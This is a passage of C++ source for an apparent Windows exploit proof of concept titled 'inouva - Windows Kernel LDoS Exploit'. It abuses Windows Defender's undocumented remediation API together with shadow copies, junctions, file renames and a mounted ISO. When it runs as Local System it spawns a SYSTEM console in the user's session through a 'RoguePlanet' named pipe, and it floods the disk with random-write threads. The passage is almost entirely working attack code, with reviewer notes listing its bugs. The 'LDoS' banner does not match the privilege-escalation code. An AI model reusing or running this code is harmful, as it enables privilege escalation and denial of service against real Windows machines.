    }
    if (!srchfound) {
        restartscan = true;
        goto scanagain;
    }
    if (objdirinfo) {
        free(objdirinfo);
        objdirinfo = NULL;
    }
    NtClose(hobjdir);
    hobjdir = NULL;
    printf("[+] New volume shadow copy detected: %ws\n", newvsspath);
    wcscpy(vsswinpath, newvsspath);
    wcscat(vsswinpath, L"\\Windows");
    RtlInitUnicodeString(&_vsswinpath, vsswinpath);
    InitializeObjectAttributes(&objattr2, &_vsswinpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
retry:
    // Probe "<device>\Windows" with attribute-read access only.  NULL is passed
    // for the ULONG FileAttributes / ShareAccess / CreateOptions arguments (all 0).
    stat = NtCreateFile(&hlk, FILE_READ_ATTRIBUTES, &objattr2, &iostat, NULL, NULL, NULL, FILE_OPEN, NULL, NULL, NULL);
    if (stat == STATUS_NO_SUCH_DEVICE) goto retry; // device object exists but is not yet usable
    if (stat) {
        printf("[!] Failed to open volume shadow copy, error: 0x%0.8X\n", stat);
        retval = RtlNtStatusToDosError(stat);
        goto cleanup;
    }
    printf("[+] Successfully accessed volume shadow copy.\n");
    CloseHandle(hlk);
    if (fullvsspath) wcscpy((wchar_t*)fullvsspath, newvsspath);
cleanup:
    if (hobjdir) NtClose(hobjdir);
    if (emptybuff) free(emptybuff);
    if (vsinitial) DestroyVSSNamesList(vsinitial);
    return retval;
}

// Callback handed to MpCleanStart (twice, see WDStartScan).  It only logs.
// NOTE(review): the callback's real prototype is undocumented; a parameterless
// DWORD() is what this PoC uses - confirm against the MpClient ABI before reuse.
DWORD MpCleanCallbackFunction() {
    printf("[*] MpCleanCallbackFunction called.\n");
    return 0;
}

// Reads HKLM\SOFTWARE\Microsoft\Windows Defender\InstallLocation into `dirname`
// (must hold MAX_PATH wchar_t).  Returns false on any registry error.
// NOTE(review): hkey is not closed on the RegQueryValueEx failure path, the
// returned type is not checked against REG_SZ, and RegQueryValueEx does not
// guarantee a NUL terminator for REG_SZ data.
bool GetWDInstallDir(wchar_t* dirname) {
    HKEY hkey = NULL;
    LSTATUS lstat = RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows Defender", NULL, KEY_QUERY_VALUE, &hkey);
    if (lstat) {
        printf("[!] Failed to open Windows Defender registry key, error: %d\n", lstat);
        return false;
    }
    DWORD keytype = REG_SZ;
    DWORD datasz = MAX_PATH * sizeof(wchar_t);
    lstat = RegQueryValueEx(hkey, L"InstallLocation", NULL, &keytype, (LPBYTE)dirname, &datasz);
    if (lstat) {
        printf("[!] Failed to query Windows Defender install location, error: %d\n", lstat);
        return false;
    }
    RegCloseKey(hkey);
    return true;
}

// Writes "<windir>\System32" into `dirname` (MAX_PATH wchar_t).  Always returns
// true; the GetWindowsDirectory result is not checked.
bool GetWERDir(wchar_t* dirname) {
    wchar_t windir[MAX_PATH] = { 0 };
    GetWindowsDirectory(windir, MAX_PATH);
    wcscpy(dirname, windir);
    wcscat(dirname, L"\\System32");
    return true;
}

// Worker thread: loads MpClient.dll from the Defender install directory and,
// through its undocumented exports, scans the global `zippath` (set elsewhere),
// expects Defender to report a threat, and starts remediation (MpCleanStart).
// NOTE(review): every failure calls ExitProcess(1) from this worker thread,
// taking the whole process down; "no threats found" exits with 0.
// NOTE(review): the function pointer types, the MpScanStart flags 0x60004000,
// the 0x90-byte scan-result buffer and the ThreatStatus == 1 check are all
// reverse-engineered assumptions about MpClient.dll, not a public contract.
DWORD WINAPI WDStartScan(void*) {
    wchar_t dllpath[MAX_PATH] = { 0 };
    if (!GetWDInstallDir(dllpath)) {
        ExitProcess(1);
    }
    // Assumes InstallLocation ends with a backslash - no separator is inserted.
    wcscat(dllpath, L"MpClient.dll");
    HMODULE hm = LoadLibrary(dllpath);
    if (!hm) {
        printf("[!] Failed to load MpClient.dll, error: %d\n", GetLastError());
        ExitProcess(1);
    }
    // _MpUpdateStart is resolved but never used or NULL-checked.
    HRESULT(WINAPI* _MpUpdateStart)(MPHANDLE, DWORD, PMPCALLBACK_INFO, PMPHANDLE) = (HRESULT(WINAPI*)(MPHANDLE, DWORD, PMPCALLBACK_INFO, PMPHANDLE)) GetProcAddress(hm, "MpUpdateStart");
    HRESULT(WINAPI* _MpManagerOpen)(DWORD, PMPHANDLE) = (HRESULT(WINAPI*)(DWORD, PMPHANDLE)) GetProcAddress(hm, "MpManagerOpen");
    HRESULT(WINAPI* _MpScanStart)(MPHANDLE, MPSCAN_TYPE, DWORD, PMPSCAN_RESOURCES, PMPCALLBACK_INFO, PMPHANDLE) = (HRESULT(WINAPI*)(MPHANDLE, MPSCAN_TYPE, DWORD, PMPSCAN_RESOURCES, PMPCALLBACK_INFO, PMPHANDLE)) GetProcAddress(hm, "MpScanStart");
    HRESULT(WINAPI* _MpScanResult)(MPHANDLE, void*) = (HRESULT(WINAPI*)(MPHANDLE, void*)) GetProcAddress(hm, "MpScanResult");
    HRESULT(WINAPI* _MpThreatOpen)(MPHANDLE, MPTHREAT_SOURCE, MPTHREAT_TYPE, PMPHANDLE) = (HRESULT(WINAPI*)(MPHANDLE, MPTHREAT_SOURCE, MPTHREAT_TYPE, PMPHANDLE)) GetProcAddress(hm, "MpThreatOpen");
    HRESULT(WINAPI* _MpThreatEnumerate)(MPHANDLE, PMPTHREAT_INFO*) = (HRESULT(WINAPI*)(MPHANDLE, PMPTHREAT_INFO*)) GetProcAddress(hm, "MpThreatEnumerate");
    HRESULT(WINAPI* _MpCleanOpen)(void*, void*, void***) = (HRESULT(WINAPI*)(void*, void*, void***)) GetProcAddress(hm, "MpCleanOpen");
    HRESULT(WINAPI* _MpCleanStart)(void*, unsigned int, void*) = (HRESULT(WINAPI*)(void*, unsigned int, void*)) GetProcAddress(hm, "MpCleanStart");
    HRESULT(WINAPI* _MpHandleClose)(MPHANDLE) = (HRESULT(WINAPI*)(MPHANDLE)) GetProcAddress(hm, "MpHandleClose");
    if (!_MpManagerOpen || !_MpScanStart || !_MpScanResult || !_MpThreatOpen || !_MpThreatEnumerate || !_MpCleanOpen || !_MpCleanStart || !_MpHandleClose) {
        printf("[!] Failed to initialize DLL imports.\n");
        ExitProcess(1);
    }
    MPHANDLE hbinding = NULL;
    HRESULT hres = _MpManagerOpen(NULL, &hbinding);
    if (hres) {
        printf("[!] Failed to open Windows Defender RPC interface, error: 0x%0.8X\n", hres);
        ExitProcess(1);
    }
    // Single-resource scan of the file at `zippath`.
    MPRESOURCE_INFO scaninfo = { 0 };
    scaninfo.Scheme = (wchar_t*)L"file";
    scaninfo.Path = zippath;
    MPSCAN_RESOURCES scanrsrc = { 0 };
    scanrsrc.dwResourceCount = 1;
    scanrsrc.pResourceList = &scaninfo;
    MPHANDLE scanctx = NULL;
    hres = _MpScanStart(hbinding, MPSCAN_TYPE_RESOURCE, 0x60004000, &scanrsrc, NULL, &scanctx);
    if (hres) {
        printf("[!] Failed to start Windows Defender scan, error: 0x%0.8X\n", hres);
        ExitProcess(1);
    }
    // Result buffer size is assumed; `sz` is unused and the buffer is never freed.
    DWORD sz = 0x90;
    void* scanres = malloc(0x90);
    ZeroMemory(scanres, 0x90);
    hres = _MpScanResult(scanctx, scanres);
    if (hres) {
        printf("[!] Failed to fetch scan results, error: 0x%0.8X\n", hres);
        ExitProcess(1);
    }
    MPHANDLE threatctx = NULL;
    hres = _MpThreatOpen(scanctx, MPTHREAT_SOURCE_SCAN, MPTHREAT_TYPE_KNOWNBAD, &threatctx);
    if (hres) {
        printf("[!] Failed to open threats, error: 0x%0.8X\n", hres);
        ExitProcess(1);
    }
    MPTHREAT_INFO* tinfo = NULL;
    hres = _MpThreatEnumerate(threatctx, &tinfo);
    // hres == 1 (S_FALSE) is taken to mean the enumeration is empty.
    if (hres == 0x1) {
        printf("[*] No threats found.\n");
        ExitProcess(0);
    }
    if (hres) {
        printf("[!] Failed to enumerate threats, error: 0x%0.8X\n", hres);
        ExitProcess(1);
    }
    if (tinfo->ThreatStatus != 0x1) {
        printf("[!] Unexpected reply from MpThreatEnumerate.\n");
        ExitProcess(1);
    }
    // Kick off remediation of the detected threat; the same logging callback is
    // passed in both slots of the callback array.
    void** ret = NULL;
    hres = _MpCleanOpen(scanctx, NULL, &ret);
    if (hres) {
        printf("[!] MpCleanOpen failed, error: 0x%0.8X\n", hres);
        ExitProcess(1);
    }
    void* callbackaddr[2] = { (void*)MpCleanCallbackFunction, (void*)MpCleanCallbackFunction };
    hres = _MpCleanStart(ret, NULL, callbackaddr);
    if (hres) {
        printf("[!] MpCleanStart failed, error: 0x%0.8X\n", hres);
        ExitProcess(1);
    }
    _MpHandleClose(scanctx);
    _MpHandleClose(threatctx);
    _MpHandleClose(hbinding);
    return ERROR_SUCCESS;
}

// Cached copy of "<isomnt>\wermgr.exe" so repeated WriteEicar calls skip the ISO read.
char* eicar_data = NULL;
DWORD eicar_sz = 0;

// Creates "<workdir>\wermgr.exe" with the contents of "<isomnt>\wermgr.exe" and
// adds a 0x1000-byte alternate data stream ":WDFOO" to it.  Returns the open
// file handle (GENERIC_READ|GENERIC_WRITE|DELETE, shared for read only) or NULL.
// Despite the name, the payload is whatever the ISO's wermgr.exe contains; the
// scan in WDStartScan only proceeds if Defender flags it.
// Both paths go straight to NtCreateFile, so `workdir` and `isomnt` need to be
// NT-style paths (e.g. \??\C:\...), not Win32 paths.
// NOTE(review): the handles are opened with CreateOptions 0 (no FILE_SYNCHRONOUS_IO_*),
// which is why every ReadFile/WriteFile below uses an OVERLAPPED + event.
// NOTE(review): `WriteFile(...) == ERROR_IO_PENDING` and the matching ReadFile
// test compare a BOOL against 997, so they are always false and I/O errors are
// never detected; the intended check is `!WriteFile(...) && GetLastError() != ERROR_IO_PENDING`.
// NOTE(review): on the cached-data fast path the function returns while the
// overlapped write may still be in flight against the stack-resident `ovp`,
// and the event is never closed.
// NOTE(review): `eicar2` is never initialised, so 0x1000 bytes of uninitialised
// heap are written into the ADS; the tail of the function (below this block)
// frees that buffer and closes the stream before waiting on the write.
// NOTE(review): eicar_sz / the ReadFile and WriteFile lengths truncate the
// 64-bit file size to 32 bits.
HANDLE WriteEicar(wchar_t* workdir, wchar_t* isomnt) {
    wchar_t eicarpath[MAX_PATH] = { 0 };
    wsprintf(eicarpath, L"%s\\wermgr.exe", workdir); // no bound on workdir length
    HANDLE hfile = NULL;
    UNICODE_STRING _eicarpath = { 0 };
    RtlInitUnicodeString(&_eicarpath, eicarpath);
    OBJECT_ATTRIBUTES eicarpathobjattr = { 0 };
    InitializeObjectAttributes(&eicarpathobjattr, &_eicarpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
    IO_STATUS_BLOCK iostat = { 0 };
    // DELETE access is requested up front so the handle can later be renamed/deleted.
    NTSTATUS stat = NtCreateFile(&hfile, GENERIC_READ | GENERIC_WRITE | DELETE | SYNCHRONIZE, &eicarpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_OVERWRITE_IF, NULL, NULL, NULL);
    if (stat) {
        printf("[!] Failed to create EICAR test file: %ws, error: 0x%0.8X\n", eicarpath, stat);
        return NULL;
    }
    // Fast path: the ISO file was already read on a previous call.  Note this path
    // does not recreate the ":WDFOO" stream.
    if (eicar_data && eicar_sz) {
        DWORD writtenbytes = 0;
        OVERLAPPED ovp = { 0 };
        ovp.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
        if (WriteFile(hfile, eicar_data, eicar_sz, &writtenbytes, &ovp) == ERROR_IO_PENDING) {
            printf("[!] Failed to write EICAR data, error: %d\n", GetLastError());
            return NULL;
        }
        return hfile;
    }
    // Slow path: read the source file from the mounted ISO.
    HANDLE hsrc = NULL;
    wchar_t eicarsrcpath[MAX_PATH] = { 0 };
    wsprintf(eicarsrcpath, L"%s\\wermgr.exe", isomnt);
    UNICODE_STRING _eicarsrcpath = { 0 };
    RtlInitUnicodeString(&_eicarsrcpath, eicarsrcpath);
    OBJECT_ATTRIBUTES eicarsrcpathobjattr = { 0 };
    InitializeObjectAttributes(&eicarsrcpathobjattr, &_eicarsrcpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
    iostat = { 0 };
    stat = NtCreateFile(&hsrc, GENERIC_READ, &eicarsrcpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN, NULL, NULL, NULL);
    if (stat) {
        // NOTE(review): reports the destination path, not the source path that failed; hfile is leaked.
        printf("[!] Failed to open EICAR test file: %ws, error: 0x%0.8X\n", eicarpath, stat);
        return NULL;
    }
    LARGE_INTEGER li = { 0 };
    GetFileSizeEx(hsrc, &li); // return value unchecked; malloc result unchecked below
    eicar_sz = li.QuadPart;
    eicar_data = (char*)malloc(li.QuadPart);
    DWORD retbytes = 0;
    OVERLAPPED ovp2 = { 0 };
    ovp2.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
    if (ReadFile(hsrc, eicar_data, li.QuadPart, &retbytes, &ovp2) == ERROR_IO_PENDING) {
        printf("[!] Failed to read EICAR data, error: %d\n", GetLastError());
        return NULL;
    }
    WaitForSingleObject(ovp2.hEvent, INFINITE);
    CloseHandle(ovp2.hEvent);
    DWORD writtenbytes = 0;
    OVERLAPPED ovp = { 0 };
    ovp.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
    if (WriteFile(hfile, eicar_data, li.QuadPart, &writtenbytes, &ovp) == ERROR_IO_PENDING) {
        printf("[!] Failed to write EICAR data, error: %d\n", GetLastError());
        return NULL;
    }
    WaitForSingleObject(ovp.hEvent, INFINITE);
    ResetEvent(ovp.hEvent); // redundant: the event is auto-reset
    // Create the ":WDFOO" stream relative to the file handle (RootDirectory = hfile).
    void* eicar2 = malloc(0x1000);
    UNICODE_STRING adsname = { 0 };
    RtlInitUnicodeString(&adsname, L":WDFOO");
    OBJECT_ATTRIBUTES objattr2 = { 0 };
    InitializeObjectAttributes(&objattr2, &adsname, OBJ_CASE_INSENSITIVE, hfile, NULL);
    HANDLE hstream = NULL;
    stat = NtCreateFile(&hstream, GENERIC_WRITE | SYNCHRONIZE, &objattr2, &iostat, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_CREATE, NULL, NULL, NULL);
    if (stat) {
        printf("[!] Failed to create EICAR stream file: %ws%ws, error: 0x%0.8X\n", eicarpath, adsname.Buffer, stat);
        return NULL;
    }
    if (WriteFile(hstream, eicar2, 0x1000, &writtenbytes, &ovp) == ERROR_IO_PENDING) { printf("[!] 
Failed to write ADS data, error: %d\n", GetLastError()); return NULL; } free(eicar2); CloseHandle(hstream); WaitForSingleObject(ovp.hEvent, INFINITE); CloseHandle(ovp.hEvent); CloseHandle(hsrc); return hfile; } bool MoveToTempDir(HANDLE hobj, wchar_t* targetpath = NULL) { GUID uid = { 0 }; RPC_WSTR wuid = { 0 }; UuidCreate(&uid); UuidToStringW(&uid, &wuid); wchar_t* wuid2 = (wchar_t*)wuid; wchar_t target[MAX_PATH] = { 0 }; if (targetpath) { wcscpy(target, targetpath); } else { ExpandEnvironmentStrings(L"\\??\\%TEMP%\\RP_", target, MAX_PATH); wcscat(target, wuid2); } IO_STATUS_BLOCK iostat = { 0 }; PFILE_RENAME_INFORMATION fri = (PFILE_RENAME_INFORMATION)malloc(sizeof(FILE_RENAME_INFORMATION) + sizeof(target)); ZeroMemory(fri, sizeof(FILE_RENAME_INFORMATION) + sizeof(target)); memmove(&fri->FileName[0], target, wcslen(target) * sizeof(wchar_t)); fri->FileNameLength = wcslen(target) * sizeof(wchar_t); fri->Flags = 0x00000001 | 0x00000040; do { NTSTATUS stat = _NtSetInformationFile(hobj, &iostat, fri, sizeof(FILE_RENAME_INFORMATION) + sizeof(target), (FILE_INFORMATION_CLASS)custom_defs::FileRenameInformationEx); if (stat == STATUS_SUCCESS) return true; if (stat == STATUS_SHARING_VIOLATION) continue; if (stat) { printf("[!] 
Failed to move directory, error: 0x%0.8X\n", stat); return false; } } while (1); return true; } bool CreateJunction(HANDLE hdir, wchar_t* target) { wchar_t rptarget[MAX_PATH] = { 0 }; wchar_t printname[1] = { L'\0' }; wcscpy(rptarget, target); size_t targetsz = wcslen(rptarget) * 2; size_t printnamesz = 1 * 2; size_t pathbuffersz = targetsz + printnamesz + 12; size_t totalsz = pathbuffersz + REPARSE_DATA_BUFFER_HEADER_LENGTH; REPARSE_DATA_BUFFER* rdb = (REPARSE_DATA_BUFFER*)HeapAlloc(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS | HEAP_ZERO_MEMORY, totalsz); rdb->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT; rdb->ReparseDataLength = static_cast(pathbuffersz); rdb->Reserved = 0; rdb->MountPointReparseBuffer.SubstituteNameOffset = 0; rdb->MountPointReparseBuffer.SubstituteNameLength = static_cast(targetsz); memcpy(rdb->MountPointReparseBuffer.PathBuffer, rptarget, targetsz + 2); rdb->MountPointReparseBuffer.PrintNameOffset = static_cast(targetsz + 2); rdb->MountPointReparseBuffer.PrintNameLength = static_cast(printnamesz); memcpy(rdb->MountPointReparseBuffer.PathBuffer + targetsz / 2 + 1, printname, printnamesz); OVERLAPPED ov = { 0 }; ov.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL); if (!ov.hEvent) { return false; } DeviceIoControl(hdir, FSCTL_SET_REPARSE_POINT, rdb, totalsz, NULL, 0, NULL, &ov); HeapFree(GetProcessHeap(), NULL, rdb); rdb = NULL; if (GetLastError() == ERROR_IO_PENDING) { DWORD retsz = 0; GetOverlappedResult(hdir, &ov, &retsz, TRUE); } if (GetLastError() != ERROR_SUCCESS) { printf("[!] 
Failed to create reparse point, error: %d\n", GetLastError()); return false; } return true; } bool MountISO(HANDLE* hiso) { GUID uid = { 0 }; RPC_WSTR wuid = { 0 }; UuidCreate(&uid); UuidToStringW(&uid, &wuid); wchar_t* wuid2 = (wchar_t*)wuid; wchar_t target[MAX_PATH] = { 0 }; ExpandEnvironmentStrings(L"%TEMP%\\RP_", target, MAX_PATH); wcscat(target, wuid2); HANDLE hf = CreateFile(target, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (!hf || hf == INVALID_HANDLE_VALUE) { printf("[!] Failed to create ISO file, error: %d\n", GetLastError()); return false; } DWORD dwbytes = 0; if (!WriteFile(hf, rawData, sizeof(rawData), &dwbytes, NULL)) { printf("[!] Failed to write data to .iso file, error: %d\n", GetLastError()); return false; } CloseHandle(hf); static const GUID VIRTUAL_STORAGE_TYPE_VENDOR_MS = { 0xEC984AEC, 0xA0F9, 0x47e9, 0x90, 0x1F, 0x71, 0x41, 0x5A, 0x66, 0x34, 0x5B }; VIRTUAL_STORAGE_TYPE vst = { VIRTUAL_STORAGE_TYPE_DEVICE_ISO, VIRTUAL_STORAGE_TYPE_VENDOR_MS }; HANDLE hvirtdisk = NULL; DWORD retval = OpenVirtualDisk(&vst, target, VIRTUAL_DISK_ACCESS_GET_INFO | VIRTUAL_DISK_ACCESS_ATTACH_RO | VIRTUAL_DISK_ACCESS_DETACH, OPEN_VIRTUAL_DISK_FLAG_NONE, NULL, &hvirtdisk); if (retval) { printf("[!] Failed to open virtual disk, error: %d\n", GetLastError()); return false; } retval = AttachVirtualDisk(hvirtdisk, NULL, ATTACH_VIRTUAL_DISK_FLAG_READ_ONLY | ATTACH_VIRTUAL_DISK_FLAG_NO_DRIVE_LETTER, NULL, NULL, NULL); if (retval) { printf("[!] Failed to attach virtual disk, error: %d\n", GetLastError()); return false; } if (hiso) *hiso = hvirtdisk; return true; } BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege) { TOKEN_PRIVILEGES tp; LUID luid; if (!LookupPrivilegeValue(NULL, lpszPrivilege, &luid)) { printf("[!] 
LookupPrivilegeValue error: %u\n", GetLastError()); return FALSE; } tp.PrivilegeCount = 1; tp.Privileges[0].Luid = luid; if (bEnablePrivilege) tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; else tp.Privileges[0].Attributes = 0; if (!AdjustTokenPrivileges(hToken, FALSE, &tp, 0, (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL)) { printf("[!] AdjustTokenPrivileges error: %u\n", GetLastError()); return FALSE; } if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) { printf("[!] The token does not have the specified privilege.\n"); return FALSE; } return TRUE; } bool IsRunningAsLocalSystem() { HANDLE htoken = NULL; if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &htoken)) { printf("[!] OpenProcessToken failed, error: %d\n", GetLastError()); return false; } TOKEN_USER* tokenuser = (TOKEN_USER*)malloc(MAX_SID_SIZE + sizeof(TOKEN_USER)); DWORD retsz = 0; bool res = GetTokenInformation(htoken, TokenUser, tokenuser, MAX_SID_SIZE + sizeof(TOKEN_USER), &retsz); CloseHandle(htoken); if (!res) return false; return IsWellKnownSid(tokenuser->User.Sid, WinLocalSystemSid); } void LaunchConsoleInSessionId(DWORD sessionid) { HANDLE htoken = NULL; if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &htoken)) return; SetPrivilege(htoken, SE_TCB_NAME, TRUE); SetPrivilege(htoken, SE_ASSIGNPRIMARYTOKEN_NAME, TRUE); SetPrivilege(htoken, SE_IMPERSONATE_NAME, TRUE); SetPrivilege(htoken, SE_DEBUG_NAME, TRUE); HANDLE hnewtoken = NULL; bool res = DuplicateTokenEx(htoken, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, TokenPrimary, &hnewtoken); CloseHandle(htoken); if (!res) return; res = SetTokenInformation(hnewtoken, TokenSessionId, &sessionid, sizeof(DWORD)); if (!res) { CloseHandle(hnewtoken); return; } STARTUPINFO si = { 0 }; si.cb = sizeof(si); PROCESS_INFORMATION pi = { 0 }; CreateProcessAsUser(hnewtoken, L"C:\\Windows\\System32\\conhost.exe", NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi); CloseHandle(hnewtoken); if (pi.hProcess) CloseHandle(pi.hProcess); if (pi.hThread) 
CloseHandle(pi.hThread); return; } DWORD WINAPI PoseidonGeneratorThread(void*) { SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_BELOW_NORMAL); WaitForSingleObject(g_poseidonevent, INFINITE); do { BCryptGenRandom(NULL, (PUCHAR)g_poseidonbuf, sizeof(g_poseidonbuf), BCRYPT_USE_SYSTEM_PREFERRED_RNG); } while (!g_poseidonexit); return ERROR_SUCCESS; } DWORD WINAPI PoseidonThread(void*) { GUID uid = { 0 }; RPC_WSTR wuid = { 0 }; UuidCreate(&uid); UuidToStringW(&uid, &wuid); wchar_t* wuid2 = (wchar_t*)wuid; wchar_t target[MAX_PATH] = { 0 }; ExpandEnvironmentStrings(L"%TEMP%\\RP_", target, MAX_PATH); wcscat(target, wuid2); HANDLE hfile = CreateFile(target, GENERIC_ALL, NULL, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_DELETE_ON_CLOSE, NULL); if (!hfile || hfile == INVALID_HANDLE_VALUE) return GetLastError(); WaitForSingleObject(g_poseidonevent, INFINITE); try { do { SetFilePointer(hfile, 0, NULL, FILE_BEGIN); DWORD ret = 0; WriteFile(hfile, g_poseidonbuf, sizeof(g_poseidonbuf), &ret, NULL); } while (!g_poseidonexit); } catch (int e) { } CloseHandle(hfile); return ERROR_SUCCESS; } int main() { printf("============================================================\n"); printf(" inouva - Windows Kernel LDoS Exploit\n"); printf(" Windows 11 25H2 (Build 26200) and later\n"); printf("============================================================\n\n"); ntdllhm = GetModuleHandle(L"ntdll.dll"); if (!ntdllhm) { printf("[!] 
Failed to get ntdll.dll handle.\n"); return 1; } _NtSetInformationFile = (NTSTATUS(WINAPI*)(HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG, FILE_INFORMATION_CLASS)) GetProcAddress(ntdllhm, "NtSetInformationFile"); _NtDeleteFile = (NTSTATUS(WINAPI*)(POBJECT_ATTRIBUTES)) GetProcAddress(ntdllhm, "NtDeleteFile"); _NtOpenDirectoryObject = (NTSTATUS(WINAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES)) GetProcAddress(ntdllhm, "NtOpenDirectoryObject"); _NtQueryDirectoryObject = (NTSTATUS(WINAPI*)(HANDLE, PVOID, ULONG, BOOLEAN, BOOLEAN, PULONG, PULONG)) GetProcAddress(ntdllhm, "NtQueryDirectoryObject"); _NtQueryInformationFile = (NTSTATUS(WINAPI*)(HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG, FILE_INFORMATION_CLASS)) GetProcAddress(ntdllhm, "NtQueryInformationFile"); if (!_NtSetInformationFile || !_NtDeleteFile || !_NtOpenDirectoryObject || !_NtQueryDirectoryObject || !_NtQueryInformationFile) { printf("[!] Failed to import NT API functions.\n"); return 1; } g_poseidonevent = CreateEvent(NULL, FALSE, FALSE, NULL); if (!g_poseidonevent) { printf("[!] 
Failed to create event.\n"); return 1; } if (IsRunningAsLocalSystem()) { printf("[*] Running as Local System.\n"); HANDLE hclient = CreateFile(L"\\\\.\\pipe\\RoguePlanet", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, NULL, NULL); if (!hclient || hclient == INVALID_HANDLE_VALUE) return 1; DWORD sesid = 0; bool sh = GetNamedPipeServerSessionId(hclient, &sesid); CloseHandle(hclient); if (sh) { LaunchConsoleInSessionId(sesid); } return 0; } SYSTEM_INFO sysinfo = { 0 }; GetSystemInfo(&sysinfo); if (sysinfo.dwNumberOfProcessors > 3) { DWORD tid = 0; CreateThread(NULL, 0, PoseidonGeneratorThread, NULL, 0, &tid); for (int i = 0; i < sysinfo.dwNumberOfProcessors; i++) { DWORD tid0 = 0; CreateThread(NULL, 0, PoseidonThread, NULL, 0, &tid0); } printf("[*] Started %d Poseidon threads.\n", sysinfo.dwNumberOfProcessors); } HANDLE hpipe = CreateNamedPipe(L"\\\\.\\pipe\\RoguePlanet", PIPE_ACCESS_DUPLEX, PIPE_WAIT, PIPE_UNLIMITED_INSTANCES, NULL, NULL, NULL, NULL); if (!hpipe || hpipe == INVALID_HANDLE_VALUE) { printf("[!] Failed to create communication pipe, error: %d\n", GetLastError()); return 1; } printf("[*] Stage 1: Mounting ISO...\n"); HANDLE hvirtdisk = NULL; if (!MountISO(&hvirtdisk)) { printf("[!] Failed to mount ISO.\n"); return 1; } printf("[+] ISO mounted successfully.\n"); wchar_t windir2[MAX_PATH] = { 0 }; GetWindowsDirectory(windir2, MAX_PATH); HANDLE hwin = CreateFile(windir2, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL); if (!hwin || hwin == INVALID_HANDLE_VALUE) { printf("[!] 
Failed to open %ws, error: %d\n", windir2, GetLastError()); return 1; } printf("[*] Stage 2: Creating working directory structure...\n"); wchar_t workdir[MAX_PATH] = { 0 }; GUID uid = { 0 }; RPC_WSTR wuid = { 0 }; UuidCreate(&uid); UuidToStringW(&uid, &wuid); wchar_t* wuid2 = (wchar_t*)wuid; ExpandEnvironmentStrings(L"%TEMP%\\RP_", workdir, MAX_PATH); wcscat(workdir, wuid2); if (!CreateDirectory(workdir, NULL)) { printf("[!] Failed to create work directory, error: %d\n", GetLastError()); return 1; } SetPriorityClass(GetCurrentProcess(), HIGH_PRIORITY_CLASS); SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL); HANDLE hdirtmp = NULL; wchar_t dirtmp[MAX_PATH] = { 0 }; wsprintf(dirtmp, L"\\??\\%s\\wdtest_temp", workdir); UNICODE_STRING _dirtmp = { 0 }; RtlInitUnicodeString(&_dirtmp, dirtmp); OBJECT_ATTRIBUTES dirtmpobjattr = { 0 }; InitializeObjectAttributes(&dirtmpobjattr, &_dirtmp, OBJ_CASE_INSENSITIVE, NULL, NULL); IO_STATUS_BLOCK iostat = { 0 }; NTSTATUS dirstat = NtCreateFile(&hdirtmp, GENERIC_READ | GENERIC_WRITE | DELETE | SYNCHRONIZE, &dirtmpobjattr, &iostat, NULL, NULL, FILE_SHARE_READ, FILE_CREATE, FILE_DIRECTORY_FILE, NULL, NULL); if (dirstat) { printf("[!] 
Failed to create working directory: %ws, error: 0x%0.8X\n", dirtmp, dirstat); return 1; } wchar_t wddirname[MAX_PATH] = { 0 }; if (!GetWERDir(wddirname)) { return 1; } wchar_t* verdirname = PathFindFileName(wddirname); wsprintf(zippath, L"%s\\%s\\wermgr.exe", workdir, verdirname); HANDLE hdir = NULL; wchar_t maindirname[MAX_PATH] = { 0 }; wsprintf(maindirname, L"\\??\\%s\\%s", workdir, verdirname); UNICODE_STRING _maindirname = { 0 }; RtlInitUnicodeString(&_maindirname, maindirname); OBJECT_ATTRIBUTES maindirobjattr = { 0 }; InitializeObjectAttributes(&maindirobjattr, &_maindirname, OBJ_CASE_INSENSITIVE, NULL, NULL); iostat = { 0 }; dirstat = NtCreateFile(&hdir, GENERIC_READ | FILE_WRITE_DATA | DELETE, &maindirobjattr, &iostat, NULL, NULL, FILE_SHARE_READ, FILE_CREATE, FILE_DIRECTORY_FILE, NULL, NULL); if (dirstat) { printf("[!] Failed to create working directory: %ws, error: 0x%0.8X\n", maindirname, dirstat); return 1; } printf("[*] Stage 3: Writing EICAR test file...\n"); wchar_t _mntpath[MAX_PATH] = { 0 }; ULONG pathsz = MAX_PATH; DWORD retval = 